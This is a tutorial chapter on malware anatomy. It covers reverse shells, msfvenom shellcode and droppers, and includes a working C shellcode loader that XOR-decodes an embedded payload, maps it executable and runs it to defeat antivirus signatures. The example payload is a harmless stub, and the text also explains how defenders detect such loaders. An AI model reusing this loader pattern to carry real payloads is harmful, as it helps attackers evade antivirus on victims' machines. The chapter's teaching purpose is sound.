Chapter 2: Anatomy of a malware

YASE - Yet Another Software Engineer


This chapter describes the fundamental components of a piece of malware and the function each of them performs.

2.1 The malware life cycle

Although each family of malicious code uses different tools, technologies and tactics, all of them share a single structural model based on the four phases that the code goes through (Figure 2.1). These phases are:

Figure 2.1. The malware life cycle.

2.2 The physical components of malware

Malware is a complex program composed of an arbitrary number of parts. Some of these components have no real utility: they are mere “red herrings” whose only purpose is to divert the observer, the reverse engineer, from the true function of the software under analysis. Other components are fundamental and present in every kind of malicious program. These can be implemented with different technologies, but their function always remains the same. The fundamental components are described in detail below.

2.2.1 The “active ingredient”

It all begins with the creation of a program that implements the basic functionality of the malware; in general, this means executing arbitrary commands on the infected machine (the malicious actions). This role is usually filled by the well-known reverse shells¹. These are programs that open a communication channel between the attacked machine and the attacker, allowing the latter to send commands to the infected system and receive their output. Although very simple, they are among the most used payloads because they are versatile and because it is the victim that initiates the connection towards the attacker (hence “reverse”), not the other way round: outbound connections are usually allowed by firewalls and IDS/IPS systems that block or inspect inbound ones, so a connect-back channel is far more likely to get through than a listener on the victim. There are hundreds of variants of reverse shells or, more generally, of payloads²; they differ in the language they are written in, the connection mode (reverse, where the victim connects to the attacker, or bind, where the victim listens and waits for the attacker to connect) and the communication protocol used (TCP, UDP, HTTP, etc.). Reverse shells can be found online both on dedicated sites such as exploit-db³ (Figure 2.2) and on generic, better-known ones such as GitHub. However, the fastest and most precise way to obtain the payload we need is the msfvenom tool from the Metasploit framework. This program generates a shellcode from the options supplied by the user (target platform, payload type, connect-back address and port, output format) and can also apply encoders to transform the final result (Figure 2.3). Note that msfvenom encoders such as x86/shikata_ga_nai were designed mainly to avoid “bad characters” in the output; their decoder stubs are well known to antivirus vendors, so encoding alone cannot be relied on for evasion.

¹ https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/

² https://www.offensive-security.com/metasploit-unleashed/payloads/

³ https://www.exploit-db.com

Figure 2.2. Non-exhaustive list of shellcodes available on exploit-db.

Figure 2.3. Creation of a shellcode using msfvenom.

2.2.2 The implant

The payload chosen for the attack is not always a full-fledged executable file. In the case of shellcodes, i.e., raw position-independent machine code, the generated bytes have no executable headers and no entry point, so the operating system cannot load and run them like an ordinary application. In these cases an implant is used: a piece of code that places the shellcode in memory and transfers control to it, so that it can do what it was generated for. The implant, therefore, must be a well-formed executable that calls the shellcode using appropriate techniques (Figure 2.4).

Figure 2.4. The matryoshka doll structure of a malware.

In some cases (ours, for example), the implant is not limited to providing a container for the shellcode, but also handles the decidedly more complex tasks of shellcode obfuscation and trace cleanup. One of the biggest problems when building malware is precisely making it invisible to antivirus (AV) software. Payloads generated automatically with msfvenom, or downloaded from the web, often fail this requirement because their signatures are already present in the databases of AV vendors. To overcome this drawback, encryption (or encoding) routines are placed directly within the implant: the shellcode is stored in encrypted form and decrypted in memory only at run time, so that the bytes on disk never match the known signature and the payload can still be executed without problems on the attacked system. Keep in mind that this defeats static signature matching only: the decryption routine itself, and behaviour such as allocating executable memory and jumping into it, can still be detected by AV or EDR products that inspect memory and API calls.
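The following is an added example, not code from the original page: a minimal implant in C for Linux that carries its shellcode XOR-encoded in the data section, decodes it into freshly allocated memory at run time, flips the page to read-execute and calls it like a function. The shellcode is a constructed, harmless stub that simply returns 42 (mov eax, 42; ret on x86-64, mov w0, #42; ret on AArch64); the 4-byte key is an arbitrary value chosen for this example, and a real implant would carry msfvenom's raw output in exactly the same way. It illustrates both points above: the shellcode has no entry point of its own and needs a well-formed executable to reach it, and the bytes stored on disk never match the plaintext payload.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Arbitrary 4-byte key chosen for this example (a real implant would use a
 * longer key or a proper cipher; the principle is identical). */
static const uint8_t KEY[] = { 0x5A, 0xC3, 0x17, 0x88 };

#if defined(__x86_64__)
/* XOR-encoded form of the constructed stub:  mov eax, 42 ; ret
 * plaintext bytes: B8 2A 00 00 00 C3 */
static const uint8_t ENCODED[] = { 0xE2, 0xE9, 0x17, 0x88, 0x5A, 0x00 };
#elif defined(__aarch64__)
/* XOR-encoded form of the constructed stub:  mov w0, #42 ; ret
 * plaintext bytes: 40 05 80 52 C0 03 5F D6 */
static const uint8_t ENCODED[] = { 0x1A, 0xC6, 0x97, 0xDA, 0x9A, 0xC0, 0x48, 0x5E };
#else
#error "example shellcode is provided only for x86-64 and AArch64"
#endif

/* XOR is its own inverse: the same routine encodes the payload at build time
 * and decodes it at run time, so the plaintext exists only in memory. */
void xor_bytes(uint8_t *buf, size_t len, const uint8_t *key, size_t keylen) {
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % keylen];
}

/* The implant proper: decode into an anonymous mapping, make it executable,
 * transfer control to it, and return whatever the shellcode returns (-1 on error). */
int run_shellcode(const uint8_t *encoded, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    memcpy(mem, encoded, len);
    xor_bytes(mem, len, KEY, sizeof KEY);          /* decrypt in place */

    /* W^X: the page is writable only while the plaintext is being produced,
     * then becomes read-execute. This write-then-execute transition is exactly
     * the behaviour that memory scanners and EDR API hooks look for. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
    __builtin___clear_cache((char *)mem, (char *)mem + len); /* needed on AArch64 */

    int (*fn)(void) = (int (*)(void))(uintptr_t)mem;         /* shellcode has no entry point: we give it one */
    int result = fn();

    munmap(mem, len);                                          /* trace cleanup */
    return result;
}

int main(void) {
    printf("shellcode returned %d\n", run_shellcode(ENCODED, sizeof ENCODED));
    return 0;
}
```

Build with `cc -o implant implant.c` and run it; on a hardened system with SELinux `execmem` restrictions or a seccomp policy forbidding `PROT_EXEC` mappings, the `mmap`/`mprotect` step fails and the function returns -1, which is a reminder that the implant's loader technique, not just the payload bytes, is what defenders can target.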

2.2.3 The vector (dropper)

The malware must, first of all, get into the target system and, if necessary, induce the victim to execute it. Very often another program, distinct from the implant, is used for this, whose sole function is to carry the malicious executable “safe and sound” onto the system. This program (in some cases it is simply a file) has no malicious functionality of its own: it merely writes the implant onto the target machine, or fetches it from a server controlled by the attacker, and then, through various steps, makes sure that it is executed by the user (Figure 2.4). Because of this function, by analogy with biology, such a program is called a vector or, using a more technical term, a dropper (from the English verb “to drop”, i.e., to deposit). Strictly speaking, a dropper carries the implant embedded within itself, while a variant that only fetches it over the network is called a downloader; in practice the two terms are often used interchangeably. The main technologies used to build droppers are the following: